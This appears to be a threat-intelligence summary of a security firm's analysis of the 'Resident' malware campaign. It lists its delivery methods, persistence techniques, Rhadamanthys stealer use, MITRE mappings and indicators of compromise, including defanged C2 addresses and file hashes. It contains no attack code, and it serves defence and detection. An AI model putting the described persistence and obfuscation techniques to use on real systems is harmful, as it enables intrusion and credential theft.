eSentire’s Threat Response Unit tracks a Russian-speaking threat group behind a campaign named Resident, targeting manufacturing, commercial, and healthcare sectors with backdoors, Cobalt Strike loaders, and the Rhadamanthys stealer. The operation spreads via phishing and drive-by downloads, dropping MSI installers and memory-resident payloads across four incidents, and leveraging various LOLBAS and scripting techniques to exfiltrate data. Hashtags: #RhadamanthysStealer #ResidentCampaign
Keypoints
- The Resident campaign targets manufacturing, commercial, and healthcare sectors across four incidents.
- Initial infection vectors include phishing emails with PDFs and drive-by downloads from compromised sites.
- The campaign drops backdoors and Cobalt Strike payloads, often via MSI installers, and uses script-based loaders (JavaScript, VBScript, PowerShell).
- Rhadamanthys stealer is deployed to exfiltrate system data, browser credentials, crypto wallets, and related artifacts.
- Case studies document extensive file drops (sdv.vbs, Imdb.vbs, index.js, resident2.exe, etc.) and multiple C2 communications.
- Technical techniques include in-memory payload loading, API hashing, RC4/base64 obfuscation, and LOLBAS usage (shell32, certutil).
- eSentire TRU proposes detections, threat hunting, and mitigations (EDR, PSAT, Attack Surface Reduction) to curb Resident and Rhadamanthys.
MITRE Techniques
- [T1592] Gather Victim Host Information – The script queries WMI for active processes, OS details, and system info. Quote: “the script uses WScript.shell object to query the Windows Management Instrumentation (WMI) for information about active processes, caption, command line, creation date, computer name, executable path, OS (Operating Systems) name, and Windows version.”
- [T1566.001] Phishing – Initial delivery via phishing email containing an attachment. Quote: “The initial infection vector we have observed is a phishing email.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – Initial Resident payload is written in JavaScript. Quote: “Initial Resident payload is written in JavaScript.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell-based payload retrieval/execution. Quote: “malicious PowerShell command mentioned before retrieves and executes the PowerShell script from 31.41.244[.]142.”
- [T1053.005] Scheduled Task/Job – Persistence via a scheduled task (RtlUpd) running at 10-minute intervals. Quote: “persistence is achieved via a scheduled task named “RtlUpd” that runs every 10 minutes starting from the time when the binary was first executed.”
- [T1547.009] Boot or Logon Autostart Execution: Shortcut Modification – Startup shortcuts establish persistence (CUGraphic.lnk launching AutoHotKey). Quote: “CUGraphic.lnk (Startup persistence) – the shortcut is responsible for launching the AutoHotKey script under ProgramData2020.”
- [S0154] Cobalt Strike – Resident deploys Cobalt Strike on infected hosts. Quote: “Resident deploys Cobalt Strike on the infected hosts.”
- [T1113] Screen Capture – The stealer tools capture screenshots of the host. Quote: “The backdoor… take a screenshot of the host.”
- [T1106] Native API – The loader uses API hashing and maps APIs at runtime. Quote: “The loader uses API hashing, shown in Figure 12.”
- [T1027] Deobfuscate/Decode Files or Information – RC4 encryption of strings and data. Quote: “The strings in the binary are encrypted with RC4 (Figure 21).”
Indicators of Compromise
- [MD5] – Example file hashes tied to observed artifacts: sdv.vbs (0e5598b0a72bf83378056ae52be6eda4) and screen1.pyw (a628240139c04ec84c0e110ede5bb40b).
- [MD5] – Imdb.vbs (c3f9b1fa3bcde637ec3d88ef6a350977) and index.js (5bdb1ac2a38ab3e43601eee055b1983f).
- [MD5] – Resident2.exe (6e1cdf38adb2d052478c6ed8e06a336a) and 7765676.exe (f199b4ef3db12ee28a05b74e61cec548).
- [IP] – 31.41.244[.]142 (PowerShell loader site) and 62.204.41[.]155 (Cobalt Strike payload host) and 62.204.41[.]171.
- [IP] – 85.192.49[.]106, 89.107.10[.]7, 79.132.128[.]79 (C2s/domains referenced in cases).
- [Domain] – saprefx[.]com (landing domain hosting JavaScript payloads).
Read more: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign